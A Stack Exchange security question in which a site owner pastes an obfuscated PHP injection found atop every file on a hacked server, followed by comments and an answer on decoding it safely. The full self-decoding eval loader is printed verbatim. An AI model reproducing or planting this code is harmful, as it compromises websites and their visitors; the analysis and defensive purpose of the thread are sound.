2

Recently I had a shared hosting server that was hacked; the following line of code was injected at the top of every PHP file on the server:

<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $pyyhlxfwxr = '!}_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;!osvufs}w;*%x5c%x78%x5c%x78257UFH#%x5c%x7827rfs%x5c%x78256~6<%x5c%x787fw6<*K)ftpmdX%x7825)m%x5c%x7825):fmji%x5c%x7878:5%x5c%x7824-%x5c%x7824-!%x5c%x7825%x5c%x782)#]341]88M4P8]37]278]225]241]334]36vg}k~~9{d%x5c%x7825:osvufs:~928>>%x5c%x7822:ftmbg39*56A:>:8:60SFTV%x5c%x7860QUUI&b%x5c%x7825!|!*)323zbek!~!<b%860opjudovg)!gj!|!*msv%x5c%x787825j:,,Bjg!)%x5c%x7825j:>>1*!%x5c%x7825b:>!%x5c%x7825ww2)%x5c%x78251]y33]68]y34]68]y33]824)#P#-#Q#-#B#-#T#-#E#-{hA!osvufs!~<3,j%x5c%x7825>166%x61%154%x28%151%x6d%160%x6c%157%x64%145%x28%141%x72%1U,6<*27-SFGTOBSUOSVUFS,6<*x7825)!gj!<2,*j%x5c%x7825-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x78255fdy>#]D4]273]D6P2L5%x5c%x7825fdy)##-!#~<%x5c%x7825h00#*<%x5c%x7825nfd)##QtpzpV%x5c%x787f%x5c%x787f%x5c%x787f%x5c%x787f<u%x5c%x7825 fjfgg($n){return chr(ord($n)-1);} @error_repo5)}.;%x5c%x7860UQPMSV25i%x5c%x785c2^<!Ce*[!%x5c%x7825cIjQeTQc5-#jt0}Z;0]=]0#)2q%x5c%x7825l}S;2-u%x5c%x7825!-#2#%x5c%x782f#y%x5c%x7825,3,j%x5c%x7825>jx5c%x7824y7%x5c%x7824-%x5c%x7824*<!%x5c%x7824-%x5c%x7824gps25)fnbozcYufhA%x5c%x78272qj%x5c%x78256<^#zsfvc%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y3:]68]y76#<%x5c%x#M5]DgP5]D6#<%x5c%x7829%73", NULL); }6197g:74985-rr.93e:5597f-s.973:c%x785c}X%x5c%x7824<!%%x7825w6Z6<.2%x5c%x7860hA%x5c%x7827pd%x5c%x78256<C%x5c%x7827pd%x5x5c%x7825s:%x5c%x785c%x5c%x7825j:^<!%x5c%x7825w%x5c%x7860%xy>#]D6]281L1#%x5c%x782f%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x78%x7824]26%x5c%x7824-%x5c%x7824<%x5c%x7825j,,*!|%x5c%x7824-%x5x5c%x7860ufldpt}X;%x5c%x7860msvd}R;*msv%x5c%x782x5c%x787f!|!*uyfu%x5c%x7827k:!ftmf!}Z;^nbsbq%x5c%x7865]y31]53]y6d]281]y43]78]y33]65]y31]55]y85]82]y76]62]y3:]84#-!OV78W~!Ypp2)%x5c%x7825zB%x5c%x7825z>!!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%yfA>2b%x5c%x7825!<*qp%x5c%x7825-*.%x5c%x7825)euhA)3of25)gpf{jt)!gj!<*2bd%x5c%x7825-#1GO%x5c%x7822#)fepmq%x7825)ftpmdR6<*id%x5c%x7825)dfyfR%x5c%x7827tfsf5d816:+946:ce44#)zbssb!>!ss6~6<&w6<%x5c%x787fw6*CW&)7gj6<*doj%x5c%x78257-C)j%x5c%x7825!*3!%x5c%x7827!hmg%x5c%x7825!)!gj!<2,*j%x5c%x7825!-#1-tusqpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824!>!tus%x5c%x7860sfqmbdf)%5!|!*!***b%x5c%x7825)sf%x5c%msv%x5c%x78257-MSV,6<*)ujojR%x5c%x7827id%x5c323ldfid>}&;!osvufs}%x5c%x787f;!opjudo825tww!>!%x5c%x782400~:<h%x5c%x7825_t%x5c%x7825:osvc%x7825yy)#}#-#%x5c%x7824-%x5c%x7824%x5c%x7825!<**3-j%x5c%x7825-bubE{h%x5c%x7825)cnbs+yfeobz+sfwjidsb%xMM*<%x22%51%x29%51%x2H,2W%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c%x7825rN}#|:7#6#)tutjyf%x5c%x7860439275ttfsqnr%x5c%x7878Bsfuvso!sGLOBALS["%x61%156%x75%156%x61"]=1; function%x782f7#@#7%x5c%x782f7^#iubq#%x5c%x785cq7825V<#65,47R25,d7R17,67R37,#%x5c%x782fq%x5c%x7825>Uc%x7824<!%x5c%x7825o:!>!%x5c%x78242178}527}88:}334}4%x5c%x7825t2w>#]y74]273]y76]252]y85]256]y6g]257]y86]267]y74]2751<!fmtf!%x5c%x7825b:>%x5c%x7825s:%x5c%x785c%x5c%x7825j:.2^,%xy7d]252]y74]256#<!%x5c%x7825ff2!>!bssbz)%x5c%x7824]2M*<(<%x5c%x78e%x5c%x78b%x5c%x7825ggg!>!#]y81]273tfs%x5c%x7825w6<%x5c%x787fw6*CWtfs%x5c%x7825)7gj6<*id%x5c34]342]58]24]31#-%x5c%x7825tdz*Wsfuvso!%x5c%x7825bss%x5c%x785csboe))1r#%x5c%x785cq%x5c%x78257%x5cx5c%x7825tzw>!#]y76]277]y72]265]y39]274]y85]273]y6g]273]y76]271]y75c%x7827!hmg%x5c%x7825)!gj!|!*1?hmg%x5c%x782787f_*#[k2%x5c%x7860{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuo7825h!>!%x5c%x7825tdz)%x5c%x7825bbT-%x5c%x7825bT-%x5c%x7825hW~f%163%x74%141%x72%164"22)gj!|!*nbsbq%x5c%x7825x7827*&7-n%x5c%x7825)utjm6<%x5c%x787fw6*CW&)7gj6<*K)ftpmdXA6~6<u%x5c%!#0#)idubn%x5c%x7860hfsq)!sp!*#ojneb#-*f%x5c%x7825)sf%x5c3]238M7]381]211M5]67]452]88]5]48]32M3]317]445]212]44fubmgoj{h1:|:*mmvo:>:iuhofm%x5c%x7825:-5fepmqnjA%x5c%x7827&6<.fmjjyf%x5c%x7860opjudovg%x5c%x7822)!gj}1~!<2p%x860FUPNFS&d_SFSFGFS%x5c%x7860QUUI&c_UOFHB%x5c%x78%x5c%x7825#%x5c%x782f#o]#%x5c%x782f*)323zbe!-#jt0*?]+^?]_%x5e{h+{d%x5c%x7825)+opjudovg+)!gj+A6|7**197-2qj%x5c%x782562%x61%171%x5f%155%x61%160%x28%42%x66%152%x66%147%x67%42%x2c%163%x74%1tussfw)%x5c%x7825zW%x5c%x7825h>Ez>%x5c%x782272qj%x5c%x7825)7gj6<**2r%x5c%x7825:|:**t%x5c%x7825)m%x5c%x7825=*h%x5cx5c%x7825)sutcvt)!gj!|!*bubE{h%x5-%x5c%x7825hOh%x5c%x782f#00#W~!%x5c%x7825t2w)##Qtjw)#]82#-#!#-%x527u%x5c%x7825)7fmji%x5c%x78786<C%x5c%x7827&6<*rfs%x5c%x78257-K)fu5c%x7824tvctus)%x5c%x7825%x5c%x7824-%x5c%x7824b!>!%x5%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.4%x5cbnpe_GMFT%x5c%x7860QIQ&f_UTPI%x5c%x7860QUUI&e_SEEB%x5c%x7#zsfvr#%x5c%x785cq%x5c%x7825%x5c%x78256<*17-SFEBFI,6<*127-UVPFNJgj<*#k#)usbut%x5c%x7860cepn)%x5c%x7825bss-%x5c%x78w%x5c%x7860TW~%x5c%x7824<%x5c%x78e%x5c%x78b%x5c%x7825mm)%x5c%x7825%x7825j:>1<%x5c%x7825j:=t53]Kc]55Ld]55#*<%x5c%x7825bG9%x782f#@#%x5c%x782fqp%x5c%x7825>5h%x5c%x7825!<*::5c%x7825%x5c%x787f!~!<##!>!2p%x{e%x5c%x7825!osvufs!*!+A!>!{e%x5c%x7825)!>>%x5c%x7822!ftmbg)!#>.%x5c%x7825!<***f%x5c%x7827,*e%x5c%x7827,*d%x5c%x7827,*c%x5c%4-%x5c%x7824*!|!%x5c%x78245c%x785c^>Ew:Qb:Qc:W~!%x5c%x7825z!>2<!5c%x7825Z<#opo#>b%x5c%x7825!*##>>X)!gjZ<#opo#>78e%x5c%x78b%x5c%x7825w:!>!%x5c7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!<*#cd2bge56+99386c6f+9c%x7825cB%x5c%x7825iN}#-!tussfw)%x5c%x7825c*W%x5c%x7825eN)ufttj%x5c%x7822)gj6<^#Y#%x5c%x785cq5c%x7825t::!>!%x5c%x7824Ypp3)%x55c%x7825b:<!%x5c%x7825c:>%]28y]#%x5c%x782fr%x5c%x7825%x5c%xx78257>%x5c%x782f7&6|7**111127-K)ebfsX%x5c%x78c%x7825!-uyfu%x5c%x7825)3of)fepdof%x5c%x786057ftbc%x5c%x7825c:>1<%x5c%x7825b:>1<!gps)%x5cf+*0f(-!#]y76]277]y72]265]y39]271]y83]2}!+!<+{e%x5c%x7825+*!*+fepdfy]572]48y]#>m%x5c%x7825:|:*r%x5c%x7825:-t%x5c%x7825)3of:opjudovg<~%x5825tzw%x5c%x782f%x5c%x7-bubE{h%x5c%x7825)sutcvt)fubmgoj~!dsfbuf%x5c%x7860gvodujpo)##-!#~<#%x5c%<##:>:h%x5c%x7825:<#64y]552]e7y]#>n%x5c%x7825<#372]58y]472]37y]]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#%x5c%x782f#7e:55946-t%x78256<%x5c%x787fw6*%x5c%x787f_*#ujojRk3%x5c%x7860{666~6<&w6<%x62%x5f%163%x70%154%x69%164%50%x2225)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%x5c%x7825%x5c%x7825%x5c%x7827jsv%x5c%x78256<C>^#zsfvr#%x5cD2P4]D6#<%x5c%x7825G]y6d]281Ld]245]K2]285]Ke]53Ld]%x78246767~6<Cw6<pd%x5c%x7825w6Z6<.5rting(0); preg_replace("%x2f%50%x2e%52%x29%57%x65","%x65%d]252]y74]256]y39]252]y83]273822l:!}V;3q%x5c%x7825}U;y]}R;2]},;osvufs}%x5c%x7827;mnui}&;zepcboepn)%x5c%x7825epnbss-%x5c%x7825r%x5c%x78x7878pmpusut!-#j0#!%x5c%x782f!**#sfmc%x7824gvodujpo!%x5c%x7824-%}:}.}-}!#*<%x5c%x7825nfd>%x5c%x7825fdy<Cb*[%x5c%x%x7825-qp%x5c%x7825)54l}%x5c%x7827;%x5c%x7825!<*#}_;#)782fh%x5c%x7825)n%x5c%x7825-#+I#)q%x5c%x7825:>:%x7878pmpusut)tpqssutRe%x5c%x::::-111112)eobs%x5c%x7860un>qp%x5V%x5c%x7827{ftmfV%x5c%x787f<*X&Z&S{fpo#>>}R;msv}.;%x5c%x782f#%x5c%x782f#%x5c%x782f},;#-#}+;%x5c)%x5c%x7825j>1<%x5c%x7c%x7825)j{hnpd!opjudovg!|!**#j{hnpd#)tut]y7:]268]y7f#<!%x5c%x7%x5c%x7878:-!%x5c%x7<#16,47R57,27R66,#%x5c%x782fq%x5c%x7825>2q%xgps)%x5c%x7825j>1<%x5c%x7825j=6[%x5c%x7825wpef)#%x5c%x7824*<!%x5c%x7825kj:!>!#]y3d]#D#-#W#-#C#-#O#-#N#*%x5c%x7824%x5c%x782f%x5c%x7825kj:-!OVM75]y83]273]y76]277#<w6*%x5c%x787f_*#fmjgk4%x5c%x7860{6~6<5c%x782f#0#%x5c%x782f*#npd%x5c%x782f#)rrd%x5c%x782f#00;quui82f2986+7**^%x5c%x782f%x5c%x7825r%x5c%xc%x78256|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf%x5c%25w6Z6<.3%x5c%x7860hA%x5*!%x5c%x7825z>3<!fmtf!%x5c%x7825z>2<]y76]258]y6g]273]y76]271]y7d]252]y74]256#<!%5c%x7824-%x5c%x7824]y8%x5c%x7824-%x5c7-K)udfoopdXA%x5c%x7822)7gj6<*QDU%x5c%x7860MPT7-NBFSUT%x5c%x7860LDPT7-UFOJ%x5c%x7860GB)fubf7860msvd},;uqpuft%x5c%x7860msvd}+;!>!}%x5c%x7827;!>>>x7827,*b%x5c%x7827)fepdof.)fepdof.%x5c%x785cq%x5c%x78257**^r.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]x5c%x7825%x5c%x787f!<X>b%xif((function_exists("%x6f%142%x5j{fpg)%x5c%x7825s:*<%x5c%x) && (!isset($GLOBALS["%x61%156%x75%156%x61"])))) { $x5c%x7825%x5c%x7824-%x5c%x7824y4%xsutcvt-#w#)ldbqov>*ofmy%x5c%x7825)utjm!|!*5!%xD!-id%x5c%x7825)uqpuft%x5c%x5)s%x5c%x7825>%x5c%x782fh%5c%x787fw6*CW&)7gj6<.[A%x5c%x7827&6<%x5c%x787fw6*%x5c%x5c%x7825<#g6R85,67R37c%x7825!|Z~!<##!>!2p%x5c%x78253]Kc#<%x5c%x7825tpz!>!#]D6M7]K3#<%x5c%x7825yb%x5c%x7825!**X)ufttj%x5c%x78)323ldfidk!~!<**qp%x5x5c%x7825)kV%x5c%x7878{**#k#)tutjyf%x5c%x7860%x5c%x7878%x5c%x7256]y81]265]y72]254]y76#<%x5c%x7825tmw!>!#]y84]2]y72]282#<!%x5c%x7825tjw!>!#]y84]275]y83]248]y83]qj%x5c%x7825)hopm3qjA)qj3hopmA%x5c%x78273qj%x5c%x78256<*Y%x5c%x785c%x7825Z<^2%x5c%x785c2b%x5c%x7825!>!2p%x5c%x7825!*3>?*2b%x5c%x78672]48y]#>s%x5c%x7825<#462]47y]252]18y]#>q%x5c%x7825<#762]67y]562]3851]y35]256]y76]72]y3d]51]y35]274]y4:]82]y3:]62]y4c#<!%x%x5c%x782f35.)1%x5c%x782f14+9**-)1%x5c%x7%x5c%x7825%x5c%x7827Y%x5c%x78256<.msv%x5c%x7860ft%134%x78%62%x35%165%x3a%146%x21%76%x21%50%x5,18R#>q%x5c%x7825V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*w%7878<~!!%x5c%x7825s:N}#-%x5c%x7825o:W%8297f:5297e:56-%x5c%x7878r.985:52985-t.98]K45c%x7860bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!%x5c%x782fc%x7825tmw)%x5c%x7825tww**WYsbogA%x5c%x7827doj%x5c%x78256<%x5c%x787fufs:~:<*9-1-r%x5c%x782ppde:4:|:**#ppde#)tutjyf%x5c%x78604%x5c%x78223c%x7827pd%x5c%x78256<pd%x5c-%x5c%x7824%x5c%x785c%x5c%x7825j^%x5c%x7824-%xx5c%x7825:<**#57]38y]47]67y]37]88y]27#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-x5c%x782f7rfs%x5c%x78256<#o]1%x5c%x782f20QUUI7jsv}A;~!}%x5c%x787f;!|!}{;)g!*72!%x5c%x7827!hmg%x5c%5)!gj!<**2-4-bubE{h%x5c%x7825)sutcvt)esp>hmg%x5c%x7825!<12>j%x5c%x782556]y78]248]y83]256]y81]265]y72]254]y76]6P6]y6gP7L6M7]D4]275]D:M8]Df#<%x5c%x7825tdz>#L4]275L3]248L3P6L1M5]fuopd%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt%x5c%x7825}K;%Oc%x5c%x782f#00#W~!Ydrr)%x5c%x7825QwTW%x5c%x7825hIr%x5c%x785c1^-%x5c%x7825r%x5c%x785c2^pdov{h19275j{hnpd19275!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~<ofm5]43]321]464]284]364]6]27f!>>%x5c%x7822!pd%x5c%x7825)!gj}Z;h!opjudovg}{;#)tutjyf%x5c%x7]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825j}l;33bq}k;opjudovg}%x5c%x7878;0]=])0#)U!%x5c%x7827{**u%x5c%x78225r%x5c%x7878B%x5c%x7825h>#]y31]278]y3e]81]K78:56985:25%x5c%x785cSFWSFT%x5c%x7860%x5c%x7825}X;!sp!*#otmfV%x5c%x787f<*XAZASV<*w%x5c%x7825)ppde>u%x5c%xjs%x5c%x7878X6<#o]o]Y%x5c%x78257;utpI#7>%sbqA7>q%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fubfsdXk5%x5c%x7860{6825j=tj{fpg)%x5c%x7825%x5c%x7824-%x5c%x7824*<!x782f%x5c%x7825%x5c%x7824-%x5c%x7824!>!fyqm+#Qi%x5c%x785c1^W%x5c%x7825c!>!%x5c%x78>2bd%x5c%x7825!<5h%x5c%x7825%xsdXA%x5c%x7827K6<%x5c%x787fw6*3qj%x5c%x78257w2!>#p#%x5c%x782f#p#%x5c%x782f%x5c%x7825z<jg!)%x5c%x7825z>>28]322]3]364]6]283]427]36]373P6]36]73]8x5c%x7825ggg)(0)%x5c%x78272%x5c%x7824<!%x5c%x7825mm!>!#]y81]273]y76]258]y6g]273]y76]271]/(.*)/epreg_replaceofqxosjrru'; $peyjqdmyjs = explode(chr((183-139)),'7333,32,3252,22,7391,53,2462,43,792,46,5856,57,512,57,3749,48,3797,22,5642,33,8280,44,1091,54,4812,31,5820,36,4148,59,1382,42,6915,24,8658,27,1235,65,6863,52,3298,69,5085,46,4030,65,9611,41,8800,49,56,64,3726,23,7056,37,7093,54,9876,44,3852,34,7937,65,1046,45,2999,28,2505,40,5721,49,7238,21,4264,28,4958,36,8231,49,9652,66,1895,48,3516,25,8553,37,6728,37,2873,57,1820,47,4292,36,569,26,2105,44,5578,64,7578,55,3137,53,9073,53,1485,48,838,21,7524,28,7147,53,0,56,9297,63,343,30,5675,46,5379,32,485,27,1943,64,9360,38,8874,24,595,66,9235,38,960,27,2274,45,7478,46,3093,44,8898,70,1684,32,3932,33,6441,40,3541,44,4547,31,8002,65,1769,51,1716,53,9846,30,6765,59,4639,63,7200,38,4498,49,6290,34,7654,29,2077,28,6047,36,2319,22,8461,61,3367,57,6261,29,4843,58,1867,28,4207,57,3585,49,293,50,7307,26,4766,46,7728,29,3274,24,7757,21,5131,51,1533,52,9515,48,6360,59,6160,54,2149,38,233,60,2407,35,9213,22,3476,40,8612,46,5259,28,3694,32,4578,61,4328,24,738,54,6324,36,9563,48,2545,52,6523,44,7633,21,8324,55,7778,62,5942,63,8849,25,9398,64,899,61,3634,60,1213,22,3027,66,5913,29,7888,49,7840,48,6708,20,2649,63,6481,22,2187,51,8590,22,7552,26,8731,37,5052,33,6214,47,3886,46,120,35,5451,63,8067,68,5287,69,2597,52,10043,63,2773,52,155,43,4702,26,8685,46,4095,53,2238,36,2007,70,7444,34,7019,37,1424,61,6083,28,987,59,6419,22,9718,46,5411,40,9764,43,6610,40,8135,55,4994,32,4901,57,9807,39,859,40,9126,34,2442,20,6005,42,1649,35,3819,33,2362,45,9160,53,3965,65,8522,31,4352,26,9462,53,1182,31,8417,44,5514,64,7259,48,7683,45,1359,23,1145,22,661,20,9008,65,5770,50,4469,29,6111,49,3190,62,681,57,198,35,9980,38,3424,52,9273,24,2930,69,8190,41,6824,39,8379,38,5182,38,4444,25,7365,26,373,43,2712,61,5026,26,1300,59,4728,38,6567,43,9920,60,6939,36,416,25,4378,66,6503,20,5356,23,461,24,8768,32,6650,58,2825,48,6975,44,10018,25,5220,39,8968,40,441,20,1585,64,2341,21,1167,15'); $rcwmfpxjbs=substr($pyyhlxfwxr,(63563-53457),(37-30)); if (!function_exists('djbxmtkyiw')) { function djbxmtkyiw($siiigmplqz, $jcodtyjdch) { $vqvamvvnqx = NULL; for($ttgvvqxcls=0;$ttgvvqxcls<(sizeof($siiigmplqz)/2);$ttgvvqxcls++) { $vqvamvvnqx .= substr($jcodtyjdch, $siiigmplqz[($ttgvvqxcls*2)],$siiigmplqz[($ttgvvqxcls*2)+1]); } return $vqvamvvnqx; };} $odgmnprvdj="\x20\57\x2a\40\x72\166\x6b\150\x73\145\x6e\143\x71\163\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\65\x37\55\x32\62\x30\51\x29\54\x20\143\x68\162\x28\50\x33\70\x31\55\x32\70\x39\51\x29\54\x20\144\x6a\142\x78\155\x74\153\x79\151\x77\50\x24\160\x65\171\x6a\161\x64\155\x79\152\x73\54\x24\160\x79\171\x68\154\x78\146\x77\170\x72\51\x29\51\x3b\40\x2f\52\x20\164\x6f\164\x71\171\x61\160\x78\146\x65\40\x2a\57\x20"; $pjegxnbdlt=substr($pyyhlxfwxr,(31614-21501),(70-58)); $pjegxnbdlt($rcwmfpxjbs, $odgmnprvdj, NULL); $pjegxnbdlt=$odgmnprvdj; $pjegxnbdlt=(391-270); $pyyhlxfwxr=$pjegxnbdlt-1; ?>

Of course I am in the process of taking the server offline and trying to figure out how it was hacked, but I would like to figure out what this PHP code does. When I visit the hacked pages and view source, nothing seems out of the ordinary; it doesn't seem to be putting anything visible to visitors into the hacked pages. Online deobfuscators that I tried failed with this sample, though my virus scanner picks it up as a backdoor. Any ideas?

tlng05
  • 10,324
  • 1
  • 34
  • 36
  • Have you seen [this](http://security.stackexchange.com/q/70579/9312) question? It looks similar. – Question Overflow Mar 25 '15 at 16:10
  • @QuestionOverflow Thanks, that link was very helpful. Do you think it is likely that the code sample here (if unobfuscated) would be similar to the one you posted, or could it be a completely different backdoor just obfuscated in a similar manner? The apache log does seem to show attempts to exploit the MailPoet plugin, but apache returned code 200 for those attempts rather than the 302, the code that sample logs I found online show. I also didn't find any attempts to access the themes folder. – tlng05 Mar 26 '15 at 02:03
  • Looking at the structure, it is most likely the same [polymorphic code](http://en.wikipedia.org/wiki/Polymorphic_code) encrypted differently to evade detection. This code is not a backdoor. The backdoor is likely from the plugin. You could edit your question to include the relevant access log so that others may be able to help you. – Question Overflow Mar 29 '15 at 12:18

1 Answers1

2

Hex decoder will clean up the \x crap, which helps, but to decode the rest you need to actually run it in PHP, because it's designed to decode itself. If you carefully pull apart the statements in there and run them one-by-one, and take care never to run an 'eval' or anything like that (replace 'eval' with 'print' to see what the decoded program code is, then decide if that's safe to run).

I don't recommend doing so unless you have some knowledge of PHP and a throwaway workstation that's off the network which you can wipe afterwards. And it's an ambitious enough project that I wouldn't bother; you don't need to do all that to know it's malcode.

If you're just curious, then that's different. Have fun. But decoding it is a straightforward programming exercise, and you might get better help on other stacks.

gowenfawr
  • 72,355
  • 17
  • 162
  • 199